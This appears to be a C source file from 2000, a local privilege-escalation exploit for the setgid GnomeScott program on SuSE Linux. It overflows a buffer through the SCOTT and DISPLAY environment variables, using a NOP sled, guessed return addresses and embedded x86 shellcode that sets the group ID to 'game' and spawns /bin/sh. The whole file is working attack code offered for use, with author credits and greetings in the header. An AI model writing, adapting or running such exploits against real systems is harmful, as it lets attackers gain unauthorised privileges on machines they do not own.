/* GnomeScott local buffer overflow. (gid=game(40))
 *
 * Author: Cody Tubbs (loophole of hhp).
 * www.hhp-programming.net / pigspigs@yahoo.com
 * 12/8/2000
 *
 * This exploit was coded at overfiens in cali.
 * Shouts to overfien and skeptik... h00t h00t.
 *
 * Tested on SuSE 6.4/2.2.14 and 7.0/2.2.16-SMP
 * sgid "game"(40) by default.
 *
 */

#include <stdio.h>

#define OFFSET 0
#define NOP    0x90
#define DBUF   256 //184+RET+68 :D
#define GID    40

static char shellcode[]=
  "\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1\x00\x31\xc0"
  "\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3\x00\xb1\x00\x31"
  "\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
  "\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
  "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
  "\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x69";

long get_sp(void){
  __asm__("movl %esp,%eax");
}

main(int argc, char **argv){
  char eipeip[DBUF], buffer[4096], heh[256+1];
  int i, offset, gid;
  long address;

  if(argc>1){
    offset=atoi(argv[1]);
  }else{
    offset=OFFSET;
  }

  address=get_sp()-offset;

  for(i=0;i<DBUF;i+=4){
    *(long *)&eipeip[i]=address;
  }

  gid=GID;
  shellcode[10]=gid;
  shellcode[22]=gid;
  shellcode[24]=gid;

  for(i=0;i<(4096-strlen(shellcode)-strlen(eipeip));i++){
    buffer[i]=NOP;
  } 

  memcpy(heh, eipeip, strlen(eipeip));
  memcpy(heh, "DISPLAY=", 8);
  putenv(heh);

  memcpy(buffer+i, shellcode, strlen(shellcode));
  memcpy(buffer, "SCOTT=", 6);
  putenv(buffer);

  fprintf(stderr, "Return address %#x, offset: %d.\n", address, offset);
  execlp("/opt/gnome/bin/GnomeScott", "GnomeScott", 0);
}
/*                   www.hack.co.za  [6 December 2000]*/